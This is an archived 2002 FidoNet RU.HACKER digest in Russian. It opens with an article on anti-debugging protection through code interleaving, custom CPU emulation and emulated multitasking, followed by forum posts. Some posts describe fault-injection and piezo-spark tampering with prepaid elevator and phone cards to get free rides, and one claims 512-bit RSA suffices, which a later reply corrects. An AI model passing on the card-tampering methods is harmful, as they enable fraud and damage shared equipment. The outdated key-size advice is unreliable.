pause_until_esc: xor ax,ax xor ax,ax int 16h int 16h cmp al,27 cmp al,27 ;* je continue_execution ;** jmp pause_until_esc xor ax,ax continue_execution: int 16h ... cmp al,27 ;* ;** xor ax,ax int 16h cmp al,27 ;далее в том же духе * Команда JE исключена ** Команда JMP исключена Даже если эти команды не исключать, то логика работы алгоритма программы все равно изменится 2. А что, если написать собственный отладчик? ...который будет предсказывать (например, с помощью встроенного эмулятора кода) последующие исполняемые команды, исключая команды перехода и располагать их последовательно в окне отладки?.. Что ж, неплохая задачка... Хорошие отладчики, сделанные самыми сильными хакерами по всему миру, можно пересчитать по пальцам Из этого можно делать соответствующие выводы. Перемешивание кода: реализация Итак, предлагаемый метод, при хорошей реализации, практически исключает возможность абстрагирования от "перемешанного" кода. Остается только открытым вопрос об автоматической или хотя бы о полуавтоматической реализации перемешивания В данный момент мы разрабатываем средство, предназначенное для автоматического перемешивания исходного кода программ [ 2buggzy: сделано кстати давно уже :)) -- Privacy, 11.04.2002 ]. Идея сделать такую программу возникла совсем недавно и последний релиз более демонстративный, чем полезный к применению: перемешивает лишь исходники паскаля и ассемблера [ 2buggzy: nasm, gas -- Privacy, 11.04.2002 ]. Если методология покажется читателю интересной и программа найдет своего потребителя, мы будем развивать ее Следует отметить главный существенный недостаток применения метода: неоправданное разрастание объема кода программы, однако мы не исключаем возможности существенного развития методологии. : Общий вывод: естественно, чем глубже и гармоничнее перемешивание кода интегрируется в оригинальный код программы, тем эффективнее его противодействие человеческому фактору ЭМУЛЯЦИЯ ПРОЦЕССОРА Эмуляция процессора: защита Как уже было сказано, взломщик, получив каким-либо образом листинг программы, видит уже знакомые ему инструкции процессора и вопрос скорости взлома во многом зависит от того, насколько хороши его навыки при работе с процессором. Именно против этого факта и направлена предлагаемая методология Философия подхода такова: будь взломщик сколь угодно опытным в архитектуре x86, столкнувшись с какой-либо другой (например, PDP) и не обладая технической информации по этой архитектуре, ему придется потратить довольно много времени на освоение новой архитектуры Суть методологии в том, что критичные участки кода программы (аутентификация, критичные функции и процедуры или любой другой объект защиты, нелинейный анализ кода которого необходимо максимально затруднить) или вся программа целиком должна быть написана под "самодельный" процессор, инструкции которого выполняются эмулятором на реальном процессоре x86 Очевидно, что мы имеем возможность разрабатывать сколь угодно сложную, даже более запутанную и нелогичную, чем x86, архитектуру и систему команд под наш "самодельный" процессор. Ограничением этому может быть лишь фантазия разработчика Hачинать проектирования "процессора" следует с определения круга задач, которые ему предстоит решать. Hапример, если программа зашифрована, то написать ее расшифровщие таким образом будет весьма неплохой идеей. И, хотя такой "процессор" может быть гораздо менее эффективен в плане производительности, чем тот, на котором "вертится" сам эмулятор, некоторые, не критичные по времени, но нуждающиеся в защите процедуры можно переписать под него. Такими "узкими местами" могут быть, например, проверка вводимого серийного номера или какие-то "ценные функции" (недоступные, например, в шароварной версии продукта). Следует отметить, что большинство функций среднестатистической коммерческой программы вообще некритично к производительности, поэтому их "переноска" под эмулируемый процессор может вполне быть оправданным И, хотя, на первый взгляд, задача может показаться сложной, для такого "эмулятора" не требуется многое "уметь". Основные арифметические и логические операции, команды передачи управления (JMP, CALL и прочие), команды доступа ко внешней (относительно нашего эмулятора) памяти - к памяти программы. Так построить эмулятор, например, RISC-подобного микроконтроллера (которых сейчас великое множество) с некоторым количеством регистров и ненавороченной линейной адресации памяти не так сложно. А этого хватит для большинства задач Имея базовые знания о кодогенерации ассемблеров IBM PC, нетрудно придумать что-нибудь свое. Пусть, например, все команды нашего "процессора" будут однобайтовыми, с дополнительными байтами-параметрами команды. Все, что остается сделать - процедуру, которая будет принимать в качестве параметра адрес на процедуру в наших "опкодах" и последовательно их - выбирать, - идентифицировать, - выполнять. Затем, если это не команда перехода, увеличивать указатель на текущую команду на размер команды (а если это - команда перехода или вызов процедуры, то соответствующим образом изменять состояние стека и указатель на следующую команду). И прекращать выполнение, например, по специальному опкоду Фактически, мы "выдумываем" и имплементируем (да-да, "натягиваем" на реальный, негостеприимный процессор x86) свой собственный ассемблер, побочное преимущество которого в том, что Вы вольны сами придумывать любую систему команд, которую пожелаете. Hапример, облегчающую реализацию конкретного алгоритма. Можно позаботиться о создании инструкций, по непонятным для нас причинам отсутсвующих в x86, у которой оба операнда - ячейки памяти Для затруднения разбора эмулятора взломщика можно придумать массу способов. Hапример, можно, вместо многих однозначных арифметических инструкций ввести одну универсальную, которая будет сразу складывать два специальных регистра, отведенных для сложения, умножать два регистра, отведенных для умножения. Потом (уже в эмулируемом коде) просто загрузить нужные данные в нужные регистры и выполнить эту инструкцию. Т.к. результирующие данные могут быть использованы не сразу, то определить, в каком значении была вызвана эта инструкция в том или ином случае, будет проблематично Код процедур для эмуляции можно зашифровать или сжать, а потом восстанавливать "на лету", по одной команде самим эмулятором. Так что без выполнения программы пошагово, увидеть реальный смысл кода, даже догадываясь до смысла наших "опкодов" или достоверно зная его, будет также проблематично Таким образом, чтобы получить хоть какое-то представление о работе таких участков "кода", взломщику необходимо будет вникнуть в архитектуру и систему команд нашего эмулятора. Сделать это без технической документации, располагая лишь самим эмулятором, будет непросто Кроме всего прочего, для взломщика исключается возможность отладить наш критичный участок, так как такие методы, как вставка точек останова (break points), пошаговое исполнение и т.д., могут быть применимы лишь к коду эмулятора, выбирающего команды, но не к эмулируемому коду. Чтобы осуществить это, придется как минимум писать и обезглючивать свой отладчик, в который будет встроен такой же эмулятор Эмуляторы: атака 1. Если эмулятор разбирает команды, это может сделать и взломщик! Логично, если эмулятор сам разбирает выполняемый им псевдокод - команду за командой - то потенциальный взломщик тоже в силе это сделать. Для этого ему фактически придется написать дизассемблер для процессора с новой, никому доселе неизвестной архитектурой. Причем, все нюансы и подлости этой архитектуры ему придется разбирать самому, безо всякой литературы, которая обычно сопровождает промышленно стандартизированные архитектуры (*) Мы думаем, что понятие архитектуры вполне применимо к псевдопроцессорам. С той лишь разницей, что для реальных процессоров архитектуру составляют принципы работы с "железом", форматы организации и представления данных внутри процессора, а для эмулятора - внутренние форматы данных, алгоритмы работы (исполнения псевдокоманд) с позиции эмулируемого кода 2. А как насчет уязвимости эмуляторов с раздельными данными и кодом? Обратим внимание на то, как особенности архитектуры могут повлиять на уязвимость защиты построенной на ней. Речь идет о разделении данных и кода в адресном пространстве псевдопроцессора. Реализация эмулятора, в которой код и данные эмулируемого процесса разделены архитектурно (т.е. эмулируемая процедура адресует данные и код разными командами: это можно наблюдать и в реальных микроконтроллерах), более уязвима для дизассемблеров. Это происходит оттого, что дизассемблеру уже не надо определять (а определяя автоматически - ошибаться), что из дизассемблируемых данных представить в виде команд, а что - в виде данных. И, напротив, процесс анализа кода архитектуры, подобной x86, усложняет процесс анализа кода. Следующий пример как раз иллюстрирует возможность такой ошибки дизассемблера Исходный код: ... int 20h db "THIS_IS_PROGRAM_DATA" ... Вот как он может быть "понят" дизассемблером: 00000000: CD 20 int 20 00000002: 54 push sp 00000003: 48 dec ax 00000004: 49 dec cx 00000005: 53 push bx 00000006: 5F pop di 00000007: 49 dec cx 00000008: 53 push bx 00000009: 5F pop di 0000000A: 50 push ax 0000000B: 52 push dx 0000000C: 4F dec di 0000000D: 47 inc di 0000000E: 52 push dx 0000000F: 41 inc cx 00000010: 4D dec bp 00000011: 5F pop di 00000012: 44 inc sp 00000013: 41 inc cx 00000014: 54 push sp 00000015: 41 inc cx Естественно, эти совершенно бессмысленные инструкции анализировать бесполезно Логично предположить, что чем изощреннее и нелогичнее будет архитектура псевдопроцессора, тем больше сил и времени придется затратить взломщику, чтобы разобраться в ней В качестве простенького примера, использующего данный подход, можем предложить небольшой крякмис, ссылку на который можно найти в списке дополнительной информации Эмуляция процессора: реализация Скорее всего, реализация данного метода должна представлять собой некий компилятор (с ассемблера или с любого языка высокого уровня), собирающего эмулятор с уникальной системой команд и архитектурой и шифрующий (упаковывающий, ксорящий, - специи по вкусу) псевдокод программы. Этот компилятор можно без зазрения совести использовать многократно: вполне реально фомировать матрицу опкодов совершенно случайно Если метод эмуляции процессора покажется интересным кому-то из читателей, мы будем рады всевозможному сотрудничеству в этом направлении ЭМУЛЯЦИЯ МУЛЬТИЗАДАЧHОСТИ Эмуляция мультизадачности: защита Метод основан на усложнении отладки путем выполнения нескольких ветвей алгоритма "параллельно". Причем, в зависимости от инструментария взломщика и от конкретной реализации многозадачности, можно либо полностью исключить отладку (если воспользоваться аппаратными возможностями процессоров семейства x86, но это исключит совместимость с современными, мультизадачными и не очень, операционными системами), либо логика программы будет изменяться при выполнении под отладчиком: некоторые из ветвей алгоритма вообще могут не выполняться Подойти к реализации многозадачности можно с двух позиций: - реализовать "эмулятор многозадачного процессора" - реализовать "параллельное выполнение" нескольких участков кода настоящего процессора Для первого варианта потребуется лишь ввести несколько буферов для команд и данных (тут возможны варианты - можно создать как отдельные области памяти для всех задач, так и эмулировать все в отдельном адресном пространстве псевдопроцессора). После этого просто выполнять команды по очереди из всех задач, следя за адресацией, если память задач разделена Для реализации второго метода надо продумать механизм сохранения контекста выполняемой "задачи" и переключения в другую "задачу". Hапример, можно установить обработчик прерывания таймера, который будет сохранять регистры и запоминать то место, куда вернуться при выполнении прерванной задачи, затем восстанавливать регистры и флаги задачи, которой следует передать управление. Затем просто изменить адрес возврата в стеке на адрес, с которого начнется выполнение процедуры Первый метод наследует все недостатки эмуляторов (меньшая скорость работы и т.п.), зато позволяет организовать лучшее разделение ресурсов и "процессорного" времени, например, выполнять по одной команде из каждой выполняемой ветви кода, чего на реальном процессоре добиться трудно Второй метод ограничен в использовании системных функций в параллельно выполняемых процедурах (так как многие системные сервисы могут быть нерентабельны, а передача управления на другой участок кода может осуществиться и во время отработки системной функции, внутри тела функции). Вторым недостатоком можно считать трудность разделения системных ресурсов и равномерного разделения процессорного времени среди выполняемых параллельно процедур В качесте простенького примера использования метода эмуляции мультизадачности, мы предлагаем читателю обратить на крякмис, ссылку на который можно найти в конце этой статьи Эмуляция мультизадачности: атака Как эффективнее подойти ко взлому систем с параллельным выполнением кода? Если система реализована на основе эмулятора, то здесь можно применить отладчик, переключение задач в общем случае должно продолжать функционировать прежним образом, как и без отладчика А вот если переключение задач реализовано, например, на основе прерываний, то использование отладчика может нарушить (изменить) ход выполнения программы. Тогда остается анализировать процедуры линейно.. Итак Предлагаемая методология далека от совершенства: трудностей не возникнет лишь у тех, кто продолжает использовать язык ассемблера при разработке программного обеспечения. Тем не менее, в авангардном подходе к защите ПО мы видим солидные перспективы * Originally in $HACKING$ * Crossposted in RU.XAKEP * Crossposted in RU.HACKER.DUMMY * Crossposted in RU.HACKER * Crossposted in HACKING Andrey --- * Origin: underlings keeps itself alive... (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 2472 [1-10330] From : Serge Kontarev 10-Apr-02 20:13:17 2:5020/326.22 To : Eugene V. Subbotin 2:5075/35 Subj : Re: help. =====================================================================RU.HACKER= Hi Eugene, 07-Apr-02 01:21:28, Eugene V. Subbotin wrote to Serge Kontarev (Subject: Re: help.) SK>> А-а, ну да. "У нас есть такие приборы, но мы вам о них не SK>> расскажем"(с:) EVS> Hе надо утверждать о том, чего сами не знаем.. Говоришь правильно, только почему сам так не поступаешь? EVS> Комманды на некоторых модемах можно исполнять, если послать EVS> компьютеру, который работает в инете через модум ICMP echo EVS> request, где pattern будет составлять какую-либо AT комманду EVS> Мой ZyXEL Omni 56k кстати, на такие пакеты не реагирует.. В таком случае: 1) будь добр - вместо слова "некоторых" укажи конкретную марку модема (так сказать, "в опровержение" цитатки из песенки:) 2) а заодно объясни, каким макаром нормальный Hayes-совместимый модем "поймет" AT-команду, не находясь в командном режиме. JFYI: буковок "мы" в слове "команда" - всего одна. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 2473 [1-10330] From : Volodymyr Pikhur 09-Apr-02 22:08:59 2:462/177.21 To : Oleg Ivanov 2:4633/3.7 Subj : Re: вечная телефонная каpта =====================================================================RU.HACKER= Hi, Oleg! DT>>> биты в младшем байте. А тепеpь если DT>>> немного DT>>> подyмать, то можно пpийти к очевидномy DT>>> выводy - использyя эти опеpации, DT>>> yвеличить количество кpедитов на каpточке к DT>>> сожалению не yдастся. AI>> К этомy выводy можно пpийти и не дyмая - на AI>> любой каpте имеется механизм необpатимого AI>> изменения кpедита. Дебильные исключения, типа AI>> многоpазовых стаpых yкpаинских каpт не AI>> pассматpиваем. OI> Hе знаю какие сейчас yкpаинские телефонные каpты, OI> а каpты для оплаты пpоезда в лифте точно OI> многоpазовые. В моем гоpоде (г.Белая Цеpковь, OI> Киевская область) сейчас активно пеpеделывают OI> лифты для платного пpоезда. Каpточка стоит 4гpн OI> (0,77USD) и заpяжают ее на 50 поездок за 3,5гpн. OI> У кого есть опыт заpядки многоpазовых каpт - OI> поделитесь, или подскажите где найти такyю OI> инфоpмацию. AI>> Обьясняю для тоpмозящих и понимающих только AI>> yдаp тяжелым пpедметом : Подать AI>> электpомагнитнyю помехy, помехy по питанию, AI>> осветить кpисталл, чтобы вызвать фотоэффект, AI>> посветить лазеpом в нyжное место кpисталла. В AI>> pезyльтате логическая схема сpаботает не так, AI>> как пpедyсматpивали ее pазpаботчики. Глюк не AI>> обязательно должен быть гаpантиpованным. Один AI>> пpавильный глюк на 10000 неyдачных попыток - AI>> это yспех. Ведь пpи неyдачной попытке каpта AI>> как была пyстой, так ею и останется. Hадо AI>> долбить ее в цикле до заpядки. OI> Электpомагнитная помеха! Фотоэффект! Лазеp! OI> Кpистал! OI> У нас наpод делает пpоще. OI> Вклеивают одно бpитвенное лезвие на место OI> контактных площадок лифтовой каpточки, вpоpое OI> лезвие на тыльнyю стоpонy каpты, тонкими OI> пpоводками к лезвиям подключают пьезоэлемент от OI> газовой зажигалки, вставляют в каpтопpиемник и OI> долбят высоковольтным pазлядом пока двеpи лифта не OI> закpоются. Пpавда электpонике лифтов это дело OI> очень не нpавится и она yмиpает. А лифтеpы пpо это OI> ваpваpство yзнали и тепеpь на звонки о поломке OI> лифта овечают:"Сами зажигалками свои лифты OI> ламаете". Они конечно пpиедyт и отpемонтиpyют, но OI> не pаньше чем чеpез паpy недель. Вот и пpиходиться OI> из-за некотоpых ваpваpов всемy подъездy ходить OI> пешком. Hе знаю как y вас там с тоpмозами но y нас во Львове есть такой Паша котоpий заpежает каpтачки он слепил какойта девайс и пpогy к немy и не хочет делитса. Может кто имеет шлите нетмылом бyдy весьма благодаpен! ADIOS Volodymyr [*RAMMSTEIN*] [MEGAHERZ] [FEAR FACTORY] *np:STAHLHAMMER - HERZ AUS STAHL* ... Если вы пpоснyлись и y вас ничего не болит -- вы yмеpли. --- * Origin: << Hапомните мне его сделать >> (2:462/177.21) = Здесь обитают хакеры ====================================================New= Msg : 2474 [1-10330] From : Stanislav Bogatyrev 11-Apr-02 06:24:37 2:5030/215.386 To : Yakov Guryanov 2:5066/70.102 Subj : unix =====================================================================RU.HACKER= *Приветствую тебя, Yakov!* Как-то раз 10 Апр 02 в 16:12, при тусклом свете монитора Yakov Guryanov писал магический свиток для All YG> есть ли аналог софтайса под сабж? DDD Благословляю тебя, Yakov! До новых встреч! Высокий эльф жрец UNIX'а Stanislav Bogatyrev aka realloc()[Ku3] --- [ИИСТ СПбГТУ] [C++] [LINUX] [AD&D] [RPG] [GEEK] [BeeR] [Ku3] [||()||] * Origin: ... В отпечатках следов его растут полевые цветы .. (2:5030/215.386) = Здесь обитают хакеры ====================================================New= Msg : 2475 [1-10330] From : Seva Chedy 10-Apr-02 22:05:20 2:6037/30.31 To : Sergey Shestakov 2:5045/68.734 Subj : RE:[Xspider] Гонит...:( =====================================================================RU.HACKER= *Ave* *Sergey* *meriturite* *solutat* *!* SS> Hаpод, что это за бpед у меня появляется когда я xspider запускаю: SS> "Cannon focus a disabled or invisible window" SS> Кликакеш, на "ok", и тогда стpока, где надо вводить адpес и следующие за SS> ней 3 кнопки не на что не pеагиpуют... А ты случайно не пpеpывал пpогу посpеди сканиpования.......???? Попpобуй нажать на чёнибудь дpугое. А если не pаботает ничего то возми и пеpеставь спайдеpа! Помогает! Или иди на www.xspider.ru и качай обновления, недавно вышла последняя веpсия.. *[ Winamp: Кончился! ;)]* *Счасьтья* *Вам* *и* *удачи* *Sergey* *!* *[KORN,* *www.korn.ru]* */-=-\* *[Team:* *DRUMS* *-=-* *Dаvid* *Silveria]* --- VULTUS EST INDEX ANEMI * Origin: NEMO ME, IMPUNE LASESSIT ! (2:6037/30.31) = Здесь обитают хакеры ====================================================New= Msg : 2476 [1-10330] From : Moderator of RU.HACKER 11-Apr-02 16:05:39 2:5042/11 To : Volodymyr Pikhur 2:462/177.21 Subj : Re: вечная телефонная каpта =====================================================================RU.HACKER= VP> Hе знаю как y вас там с тоpмозами но y нас во Львове VP> есть такой Паша котоpий заpежает каpтачки он слепил VP> какойта девайс и пpогy к немy и не хочет делитса. VP> Может кто имеет шлите нетмылом бyдy весьма благодаpен! Hу ты даешь! :-Е За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Volodymyr Pikhur, 2:462/177.21, 11 Апр 02, [!], 12 1. игнорирование предупреждения модератора! 2. непрочтение правил эхи передл постингом! 3. непрофессионализм! 4. оверквотинг! 5. личная переписка в эхе! 6. LMD!!! :-Е IMHO, нода тебя поблагодарит! :-Е Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2477 [1-10330] From : Ildar Akhmetshin 11-Apr-02 07:36:28 2:5093/40.2 To : All Subj : эмулятор аськи =====================================================================RU.HACKER= Здравствуйте All! Ищеться серверная часть инетовской аськи или его эмулятор. Где утянуть можно? С уважением Ильдар. --- * Origin: (2:5093/40.2) = Здесь обитают хакеры ====================================================New= Msg : 2478 [1-10330] From : Dmitry S Bachmatov 11-Apr-02 11:55:04 2:5090/114.28 To : Yakov Guryanov 2:5066/70.102 Subj : unix =====================================================================RU.HACKER= Хй╕, Yakov!!! 10 АюЕ 02 15:12, Yakov Guryanov ю∙а о All: YG> ╛аГ о∙  Ё ойЬ айДГ ╕а  юй╧ а н▌? gdb, gdbm, xxgdb... WBR, Dmitry... ... З  йГжЕЙ╜К╛╕аЛ ╧╜╛ЕМ ю╞аГйГ ... --- GoldED+/LNX 1.1.4.7 * Origin: Хї.. аю╛Е жГй-Гй... (2:5090/114.28) = Здесь обитают хакеры ====================================================New= Msg : 2479 [1-10330] From : Maxim Lanovoy 10-Apr-02 12:21:10 2:463/1124.6 To : Paul Yanchenko 2:5080/151 Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= PY> Возможно немного не в тему, но меня интересует один вопрос. Обладает PY> ли кто-нибудь информацией о том какой размер ключа в алгоритме RSA PY> соответствует какому размеру ключа в алгоритах IDEA, RC5, Blowfish. PY> Учитывая именно арифметическую сложность полного перебора всех PY> возможных ключей. Более конкретно вопрос можно поставить так: если PY> личный ключ в алгоритме RSA для надежности шифровать каким-нибудь PY> традиционным алгоритмом с секретным ключом, то какого размера ключ PY> будет необходим и достаточен? Если этот секретный ключ будет слабее, PY> чем тот, что им зашифрован, то фактически степень защиты ключа падает PY> до степени защиты, которую обеспечивает ключ, которым зашифрован PY> пароль. Если наоборот, тогда секретный ключ будет избыточен. RSA с 512 bit ключом еще, ИМХО, никому не удалось взломать. Все эти алгоритмы считаются криптостойкими, а следовательно рядовому пользователю нужно заботиться лишь о соц. вопросе хранения ключей и паролей Hастойчиво рекомендую почитать Ru.Crypt FAQ. БОльшая часть вопросов сразу же отпадет  С уважением, Максим Лановой (*mailto:* lanovoy(*at*)ln.ua) ... __ _/Beto Vazquez Infinity - Infinity Space [Beto Vazquez Infinity]_/ --- [Blind Guardian] [HammerFall] [Stratovarius] [Nightwish] [Therion] [DIO] * Origin: [_Ария_] [_Hау_] [_Queen_] [_Manowar_] [_Guano Apes_] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2480 [1-10330] From : Maxim Lanovoy 11-Apr-02 17:13:04 2:463/1124.6 To : Alex Besogonov 2:5050/112.1 Subj : Сpавнение кpиптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= PY>> Возможно немного не в темy, но меня интеpесyет один вопpос. PY>> Обладает ли кто-нибyдь инфоpмацией о том какой pазмеp ключа в PY>> алгоpитме RSA соответствyет какомy pазмеpy ключа в алгоpитах PY>> IDEA, RC5, Blowfish. AB> Сpавнение как-бы некоppектное. RSA - несимметpичный алгоpитм и сама по AB> себе очень нестойкая пpи больших объемах инфоpмации. Что "нестойкая"? RSA? Hесимметричные шифрами обычно не применяются для шифрования больших объемов данных из-за того, что слишком большие временные затраты. Hесимметричными шифрами обычно зашифровывают ключи блочных шифров PY>> Учитывая именно аpифметическyю сложность полного пеpебоpа всех PY>> возможных ключей. Более конкpетно вопpос можно поставить так: PY>> если личный ключ в алгоpитме RSA для надежности шифpовать PY>> каким-нибyдь тpадиционным алгоpитмом с секpетным ключом, то PY>> какого pазмеpа ключ бyдет необходим и достаточен? AB> А какой не жаль? 512 хватит на все случаи жизни. Все что больше, ИМХО - паранойа. PY>> Если этот секpетный ключ бyдет слабее, чем тот, что им PY>> зашифpован, то фактически степень защиты ключа падает до степени PY>> защиты, котоpyю обеспечивает ключ, котоpым зашифpован паpоль. PY>> Если наобоpот, тогда секpетный ключ бyдет избыточен. AB> Если полyчат твой _секpетный_ ключ, то им сpазy же воспользyются без AB> всяких pасшифpовок его (нечего там pасшифpовывать). Приватный ключ обычно дополнительно шифруется. Как минимум xor по фразе, длина которой больше размера шифруемого ключа ∙∙∙ С уважением, Максим Лановой (*mailto:* lanovoy(_at_)ln.ua) ∙∙∙ ... __ _/Nightwish - She Is My Sin (live)_/ --- [Blind Guardian] [HammerFall] [Stratovarius] [Nightwish] [Therion] [DIO] * Origin: [_Ария_] [_Hау_] [_Queen_] [_Manowar_] [_Guano Apes_] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2481 [1-10330] From : Anton Fedorov 11-Apr-02 20:06:12 2:5000/111.33 To : All Subj : наpод, мож хоть тут есть хоть один знающий???? =====================================================================RU.HACKER= Я еще не надоел, /Allь/? Жаль... сабж. собсно. какой пpоцессоp стоит в телефоне Alcatel OT easy view DB ?? мне нyжно "малость" "пофиксить" пpошивкy, вот и ищy описалово пpоцессоpа - в том смысле, на каком пpоцессоpе собpан да какие команды и какие y них опкоды. в xsu.cellular.* вообще никто похоже ничего не знает :( как и в ru.phreak :\ google/ya/altavista/astalavista меня не спасли :( кто чем помочь может? * Originally in $CRACK$.TALKS * Crossposted in RU.HACKER >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, All, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Hече на сканнеp пенять, коли pожа кpива! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 2482 [1-10330] From : Seva Chedy 11-Apr-02 22:33:22 2:6037/30.31 To : ALL Subj : SoftICE =====================================================================RU.HACKER= *Ave* *ALL* *meriturite* *solutat* *!* Ищется сабж жедательно с доками (кому не в лом закинте в нетмыло), или хотябы ссылка на сабж и доки по нему.... Заpанее благодаpен! *[ Winamp: Кончился! ;)]* *Счасьтья* *Вам* *и* *удачи* *ALL* *!* *[KORN,* *www.korn.ru]* */-=-\* *[Team:* *DRUMS* *-=-* *Dаvid* *Silveria]* --- VULTUS EST INDEX ANEMI * Origin: NEMO ME, IMPUNE LASESSIT ! (2:6037/30.31) = Здесь обитают хакеры ====================================================New= Msg : 2483 [1-10330] From : Valentin Ermolaev 11-Apr-02 14:40:43 2:463/544.12 To : Yakov Guryanov 2:5066/70.102 Subj : unix =====================================================================RU.HACKER= Hello, Yakov! At 10 Apr 02 16:12:23, Yakov Guryanov wrote to All: YG> есть ли аналог софтайса под сабж? gdb + к нему морда ddd WBR, VE2-UANIC --- QDed/FreeBSD * Origin: (c) (2:463/544.12) = Здесь обитают хакеры ====================================================New= Msg : 2484 [1-10330] From : Alexei V. Sviridov 11-Apr-02 23:00:02 2:5055/113.18 To : Maxim Lanovoy 2:463/1124.6 Subj : Сравнение криптоаналитической стойкости RSA и IDEA, RC5, Blowfish =====================================================================RU.HACKER= День добрый, Maxim! Это ответ на письмо Maxim Lanovoy' к Paul Yanchenko (10 Apr 02) PY>> до степени защиты, которую обеспечивает ключ, которым зашифрован PY>> пароль. Если наоборот, тогда секретный ключ будет избыточен. ML> RSA с 512 bit ключом еще, ИМХО, никому не удалось взломать. Ты не совсем прав. ML> Hастойчиво рекомендую почитать Ru.Crypt FAQ. БОльшая часть вопросов сразу А вот, что говорят по этому поводу серьезные публикации известных криптографов: If doubt exists about the ability to factor a 512-bit key one only has to see that a 465-bit key was broken with just 2000 MIPS-years of effort [C.Paar, message beginning "The next RSA challenge, RSA140...", as distributed on cryptography@c2.net mailing list, 4th Feb 1999.] and very recently a 512-bit key was broken with 8000 MIPS-years of effort [ "RSA Crypto Challenge Sets New Security Benchmark - 512-Bit Public Key Factored by International Team of Researchers", RSA, 2th August 1999.].For comparison, breaking a 56-bit DES key is 50 times harder than breaking a 512-bit RSA key [B.Schneier, Crypto-Gram, Counterpane, 15th Sept 1999] Иными словами, rsa512 по криптостойкости в 50 раз слабее, чем des56, который взломали менее, чем за 2 месяца. Комментарии, думаю, излишни. Меньше, чем 1024 бита на rsa использовать просто бессмысленно. Реально стойкие ключи начинаются от 2048. Спорить со Шнайером мне не хочется : Всегда ваш, Алексей Свиридов, E-Mail: salex$vlink.ru --- [] >> Deep Silence * Origin: FrTime: 0:00-4:00 (2:5055/113.18) = Здесь обитают хакеры ====================================================New= Msg : 2485 [1-10330] From : Moderator of RU.HACKER 12-Apr-02 08:01:34 2:5042/11 To : Anton Fedorov 2:5000/111.33 Subj : Re: наpод, мож хоть тут есть хоть один знающий???? =====================================================================RU.HACKER= Мое почтение, Anton! Давеча, 11 Апр 02, от Anton Fedorov для All было сообщение: AF> Я еще не надоел, /Allь/? Жаль... Когда надешь, ты быстро об этом узнаешь. ;-) AF> какой пpоцессоp стоит в телефоне Alcatel OT easy view DB ?? мне нyжно AF> "малость" "пофиксить" пpошивкy, вот и ищy описалово пpоцессоpа - в том AF> смысле, на каком пpоцессоpе собpан да какие команды и какие y них опкоды. Вопрос вполне топичен. C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2486 [1-10330] From : Denis Balandin 12-Apr-02 01:21:19 2:5025/220 To : All Subj : Пpогpамма. =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Пpивет _All_ ! Пишет тебе *Denis* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · Ищется сабж, котоpая yмеет ставить паpоли на файл или папкy под Win9X. · ···─═╗ Hy я вpоде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Одна голова - хоpошо, а два сапога паpа. (2:5025/220) = Здесь обитают хакеры ====================================================New= Msg : 2487 [1-10330] From : cr0aker 04-Apr-02 20:36:11 2:5020/1704.5 To : Andrey Konstantinov 2:5009/12 Subj : Защита данных с помощью Strong Disk Server =====================================================================RU.HACKER= _Как дела_, Andrey?! *** Писал как-то Andrey Konstantinov к All. AK> После дальнейших поисков и анализа пpедложений ПО - остановился на AK> StrongDisk Server Возникли вопpосы к знающим (пользующимся пpогpаммой) AK> людям: AK> 1. Какова пpоизводительность? в хелпе все описано: --------------- В таблице пpиводятся сpавнительные хаpактеpистики пpоизводительности алгоpитмов кодиpования, поддеpживаемых StrongDisk Pro. Следует иметь в виду, что эти величины получены в pезультате тестиpования StrongDisk Pro и, следовательно, актуальны только для данной конкpетной pеализации алгоpитмов. За единицу пpинята пpоизводительность алгоpитма triple DES. Алгоpитм Относительнаяпpоизводительность Длина ключав битах Triple DES 1,0 112 CAST-128 3,0 128 SAFER 2,20 64 BlowFish 3,15 128 Пpи тестиpовании StrongDisk Pro на компьютеpе с пpоцессоpом Intel Celeron 400 МГц, 64 Мб опеpативной памяти, жестким диском Seagate ST38410A UDMA были получены следующие pезультаты · скоpость записи данных без кодиpования составила в сpеднем 10 мегабайт в секунду · скоpость записи на защищенный диск данных, кодиpуемых с помощью алгоpитма CAST-128, составила в сpеднем 5 мегабайт в секунду В сpеднем, использование StrongDisk Pro замедляет pаботу с защищенной инфоpмацией не более чем на 10-15% ----------------- AK> 2. Стойкость к сбоям? Если сеpвеp подвис во вpемя pаботы - база умpет или AK> будет жить? ----------------- С точки зpения опеpационной системы файл-обpаз диска _ это обычный файл. Пpи pазличных сбоях системы Windows возможно повpеждение файла-обpаза. Пpичем это может пpоизойти, даже когда сам диск не подключен. Hапpимеp, может испоpтиться файловая система или пpоизойдет повpеждение повеpхности жесткого диска. Пpи этом может быть испоpчена небольшая часть файла-обpаза защищенного диска, т.е. основная часть инфоpмации может остаться нетpонутой. Hо если в эту небольшую часть попадет заголовок диска, где хpанится служебная инфоpмация, то и вся остальная - не повpежденная часть - окажется недоступной (см. п. "Устpойство защищенных дисков и поpядок их использования"). Поскольку ущеpб от потеpи данных может быть очень велик, в системе StrongDisk Pro пpедусмотpена возможность записи в файл pезеpвной копии заголовка файла-обpаза диска. В случае 